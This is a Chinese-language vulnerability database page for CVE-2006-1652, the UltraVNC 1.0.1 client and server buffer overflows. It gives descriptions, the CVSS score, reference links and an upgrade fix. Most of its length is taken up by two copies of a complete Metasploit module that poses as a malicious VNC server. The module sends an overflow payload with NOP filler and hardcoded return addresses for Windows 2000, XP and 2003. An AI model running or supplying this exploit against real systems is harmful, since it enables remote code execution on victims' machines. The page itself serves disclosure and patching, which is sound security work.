CVE-2006-1652
CVSS9.0
发布时间 :2006-04-06 06:04:00
修订时间 :2011-03-07 00:00:00
NMCOEP    

[原文]Multiple buffer overflows in (a) UltraVNC (aka Ultr@VNC) 1.0.1 and earlier and (b) tabbed_viewer 1.29 (1) allow user-assisted remote attackers to execute arbitrary code via a malicious server that sends a long string to a client that connects on TCP port 5900, which triggers an overflow in Log::ReallyPrint; and (2) allow remote attackers to cause a denial of service (server crash) via a long HTTP GET request to TCP port 5800, which triggers an overflow in VNCLog::ReallyPrint.


[CNNVD]Ultr@VNC多个远程缓冲区溢出漏洞(CNNVD-200604-071)

        Ultr@VNC是一种远程终端模拟软件,允许通过Internet或网络在用户屏幕上显示其他计算机的屏幕执行各种操作。
        Ultr@VNC的实现上存在多个缓冲区溢出漏洞,远程攻击者可能利用这些漏洞控制服务器或客户端。
        Ultr@VNC不加检查地把数据复制到固定的大小的缓冲区,导致栈溢出的发生,服务器和客户端都有可能被执行任意指令。

- CVSS (基础分值)

CVSS分值: 9 [严重(HIGH)]
机密性影响: COMPLETE [完全的信息泄露导致所有系统文件暴露]
完整性影响: COMPLETE [系统完整性可被完全破坏]
可用性影响: COMPLETE [可能导致系统完全宕机]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: [--]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

cpe:/a:ultravnc:vnc_viewer:1.0.1
cpe:/a:ultravnc:tabbed_viewer:1.29

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1652
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1652
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-071
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/xforce/xfdb/25650
(UNKNOWN)  XF  ultr@vnc-vnclogreallyprint-bo(25650)
http://xforce.iss.net/xforce/xfdb/25648
(UNKNOWN)  XF  untr@vnc-error-bo(25648)
http://www.vupen.com/english/advisories/2006/1240
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1240
http://www.securityfocus.com/bid/17378
(UNKNOWN)  BID  17378
http://www.securityfocus.com/archive/1/archive/1/430711/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060411 Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer POC
http://www.securityfocus.com/archive/1/archive/1/430287/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060405 Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer and server
http://www.securityfocus.com/archive/1/archive/1/429930/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060404 Buffer-overflow in Ultr@VNC 1.0.1 viewer and server
http://securityreason.com/securityalert/674
(UNKNOWN)  SREASON  674
http://secunia.com/advisories/19513
(VENDOR_ADVISORY)  SECUNIA  19513
http://milw0rm.com/exploits/1643
(UNKNOWN)  MILW0RM  1643
http://milw0rm.com/exploits/1642
(UNKNOWN)  MILW0RM  1642
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/044901.html
(UNKNOWN)  FULLDISC  20060404 Buffer-overflow in Ultr@VNC 1.0.1 viewer and server

- 漏洞信息

Ultr@VNC多个远程缓冲区溢出漏洞
高危 缓冲区溢出
2006-04-06 00:00:00 2006-08-28 00:00:00
远程  
        Ultr@VNC是一种远程终端模拟软件,允许通过Internet或网络在用户屏幕上显示其他计算机的屏幕执行各种操作。
        Ultr@VNC的实现上存在多个缓冲区溢出漏洞,远程攻击者可能利用这些漏洞控制服务器或客户端。
        Ultr@VNC不加检查地把数据复制到固定的大小的缓冲区,导致栈溢出的发生,服务器和客户端都有可能被执行任意指令。

- 公告与补丁

        目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
        http://ultravnc.sourceforge.net/

- 漏洞信息 (16490)

UltraVNC 1.0.1 Client Buffer Overflow (EDBID:16490)
windows remote
2010-04-30 Verified
0 metasploit
[点击下载] [点击下载]
##
# $Id: ultravnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in UltraVNC Win32
				Viewer 1.0.1 Release.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-1652' ],
					[ 'OSVDB', '24456' ],
					[ 'BID', '17378' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 4 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.006\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(980 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
		sploit << payload.encoded + filler + [target.ret].pack('V')
		sploit << "PASSWORD" + [0xe8, -997].pack('CV')

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
		

- 漏洞信息 (F83231)

UltraVNC 1.0.1 Client Buffer Overflow (PacketStormID:F83231)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
windows
CVE-2006-1652
[点击下载]

This Metasploit module exploits a buffer overflow in UltraVNC Win32 Viewer 1.0.1 Release.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in UltraVNC Win32
				Viewer 1.0.1 Release.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2006-1652' ],
					[ 'OSVDB', '24456' ],
					[ 'BID', '17378' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 4 2006',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.006\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(980 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
		sploit << payload.encoded + filler + [target.ret].pack('V')
		sploit << "PASSWORD" + [0xe8, -997].pack('CV')

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
    

- 漏洞信息

24456
Ultr@VNC Log::ReallyPrint Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public

- 漏洞描述

A buffer overflow exists in UltraVNC. The Log::ReallyPrint function fails to validate 'connection failed' messages resulting in a buffer overflow. With a malicious VNC server, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2006-04-04 Unknow
2006-04-11 Unknow

- 解决方案

Upgrade to version 1.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站